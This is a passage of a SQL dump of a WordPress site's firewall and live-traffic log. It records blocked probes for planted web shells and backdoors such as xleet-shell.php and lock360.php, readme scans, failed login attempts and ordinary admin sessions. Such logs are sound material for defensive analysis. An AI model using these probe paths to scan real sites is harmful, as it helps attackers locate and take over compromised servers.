User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2xvY2FsLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134248,1699995011.660726,1699995011.651800,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/vendor/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3ZlbmRvci8=\",\"category\":\"brute-force\",\"ssl\":1}'),(134249,1699995010.142334,1699995010.127400,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/Public/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L1B1YmxpYy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(134250,1699995008.420483,1699995008.408400,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/assets/images/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Fzc2V0cy9pbWFnZXMv\",\"category\":\"brute-force\",\"ssl\":1}'),(134251,1699995006.806108,1699995006.792600,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/upload/image/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3VwbG9hZC9pbWFnZS8=\",\"category\":\"brute-force\",\"ssl\":1}'),(134252,1699995005.079453,1699995005.065300,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/vendor/phpunit/phpunit/src/Util/PHP/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3ZlbmRvci9waHB1bml0L3BocHVuaXQvc3JjL1V0aWwvUEhQLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134253,1699995003.418802,1699995003.409900,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/assets/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Fzc2V0cy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(134342,0.000000,1700071298.257915,0x00000000000000000000FFFF4C8278C6,1,200,0,2,0,'https://eckankar-colorado.org/wp-login.php?action=logout&_wpnonce=523ca74629','https://eckankar-colorado.org/wp-admin/profile.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0','logout',NULL,NULL),(134343,0.000000,1700071336.884925,0x00000000000000000000FFFF4C8278C6,0,302,0,2,0,'https://eckankar-colorado.org/wp-login.php','https://eckankar-colorado.org/wp-login.php?loggedout=true&wp_lang=en_US','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Edg/119.0.0.0','loginOK',NULL,NULL),(134344,0.000000,1700071403.814218,0x00000000000000000000FFFF4C8278C6,1,200,0,2,0,'https://eckankar-colorado.org/wp-login.php?action=logout&_wpnonce=a24ef8fbd3','https://eckankar-colorado.org/wp-admin/profile.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Edg/119.0.0.0','logout',NULL,NULL),(134345,0.000000,1700071542.782487,0x00000000000000000000FFFF4C8278C6,0,302,0,2,0,'https://eckankar-colorado.org/wp-login.php','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Fwww.eckankar-colorado.org%2Fwp-admin%2F&reauth=1','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0','loginOK',NULL,NULL),(134346,0.000000,1700072661.681955,0x00000000000000000000FFFF4C8278C6,1,200,0,2,0,'https://eckankar-colorado.org/wp-login.php?action=logout&_wpnonce=9342bd7050','https://eckankar-colorado.org/wp-admin/profile.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0','logout',NULL,NULL),(134347,1700075334.484582,1700075334.462800,0x00000000000000000000FFFF33DE9E0E,0,403,0,0,0,'https://eckankar-colorado.org/style.php?sig=update&domain=51.79.124.111','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134348,0.000000,1700081246.358331,0x00000000000000000000FFFF226A61DA,0,200,0,0,0,'https://eckankar-colorado.org//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134349,0.000000,1700081246.735879,0x00000000000000000000FFFF226A61DA,0,200,0,0,0,'https://eckankar-colorado.org//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134350,0.000000,1700081247.105304,0x00000000000000000000FFFF226A61DA,0,200,0,0,0,'https://eckankar-colorado.org//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134351,1700084124.710988,1700084124.702800,0x00000000000000000000FFFFB063876E,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/usc-e-shop/readme.txt',NULL,'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91c2MtZS1zaG9wL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91c2MtZS1zaG9wL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134388,0.000000,1700130983.835422,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134389,0.000000,1700131588.895725,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134352,1700084124.710366,1700084124.702800,0x00000000000000000000FFFFB063876E,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/usc-e-shop/readme.txt',NULL,'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91c2MtZS1zaG9wL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91c2MtZS1zaG9wL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134353,1700085497.438363,1700085497.429200,0x00000000000000000000FFFF55728ADC,0,403,0,0,0,'https://eckankar-colorado.org/406.shtml',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"LzQwNi5zaHRtbA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134354,1700085490.089636,1700085490.080300,0x00000000000000000000FFFF55728ADC,0,403,0,0,0,'https://eckankar-colorado.org/xl2023x.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3hsMjAyM3gucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134390,0.000000,1700132214.627693,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134391,0.000000,1700132854.955486,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134355,1700085483.008595,1700085482.999300,0x00000000000000000000FFFF55728ADC,0,403,0,0,0,'https://eckankar-colorado.org/xxl.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3h4bC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134356,1700085480.675509,1700085480.666800,0x00000000000000000000FFFF55728ADC,0,403,0,0,0,'https://eckankar-colorado.org/xl2023.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3hsMjAyMy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134392,1700133302.142433,1700133302.126400,0x00000000000000000000FFFFC2A9AF1A,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/css/wp-login.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2Nzcy93cC1sb2dpbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134385,1700126209.468768,1700126209.446700,0x00000000000000000000FFFFC2A9AF5C,0,403,0,0,0,'https://eckankar-colorado.org/inputs.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2lucHV0cy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134357,1700085472.168498,1700085472.146700,0x00000000000000000000FFFF55728ADC,0,403,0,0,0,'https://eckankar-colorado.org/xleet.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3hsZWV0LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134382,0.000000,1700119335.593142,0x00000000000000000000FFFF7AAD1F4F,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','http://fundacionfarrah.org/administrator/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134383,0.000000,1700119445.842900,0x00000000000000000000FFFF14C1E801,0,200,0,0,0,'https://eckankar-colorado.org//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134358,1700085602.911968,1700085602.823600,0x00000000000000000000FFFF55728ADC,0,403,0,0,0,'https://eckankar-colorado.org/iR7SzrsOUEP.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2lSN1N6cnNPVUVQLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134381,1700106393.741868,1700106393.733000,0x00000000000000000000FFFFC2A9AF5C,0,403,0,0,0,'https://eckankar-colorado.org/inputs.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2lucHV0cy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134359,1700085587.442095,1700085587.432700,0x00000000000000000000FFFF55728ADC,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/xl2023.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQveGwyMDIzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134360,1700085579.673764,1700085579.657700,0x00000000000000000000FFFF55728ADC,0,403,0,0,0,'https://eckankar-colorado.org/cgi-bin/iR7SzrsOUEP.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NnaS1iaW4vaVI3U3pyc09VRVAucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134361,1700085575.546014,1700085575.536700,0x00000000000000000000FFFF55728ADC,0,403,0,0,0,'https://eckankar-colorado.org/admin-heade.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FkbWluLWhlYWRlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134376,1700097500.153621,1700097500.149900,0x00000000000000000000FFFF68FAEE68,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/install.php',NULL,NULL,'blocked:waf','WordPress New Install File Probing','{\"learningMode\":0,\"failedRules\":\"506\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWFkbWluL2luc3RhbGwucGhw\",\"path\":\"L3dwLWFkbWluL2luc3RhbGwucGhw\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134362,1700085568.058342,1700085568.049600,0x00000000000000000000FFFF55728ADC,0,403,0,0,0,'https://eckankar-colorado.org/xleet-shell.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3hsZWV0LXNoZWxsLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134377,0.000000,1700098647.430738,0x00000000000000000000FFFF67B0A7C0,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','https://commission.ufolepcyclosport45.fr/administrator/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15','loginFailInvalidUsername',NULL,NULL),(134378,0.000000,1700104750.339729,0x00000000000000000000FFFF6BBD073A,0,200,0,0,0,'https://mail.eckankar-colorado.org/wp-login.php','','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/34.0.1847.116 Chrome/34.0.1847.116 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134363,1700085559.870312,1700085559.848200,0x00000000000000000000FFFF55728ADC,0,403,0,0,0,'https://eckankar-colorado.org/lock360.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2xvY2szNjAucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134364,1700085544.241194,1700085544.232400,0x00000000000000000000FFFF55728ADC,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/images/iR7SzrsOUEP.php',NULL,'Mozlila/5.0 (Linux; 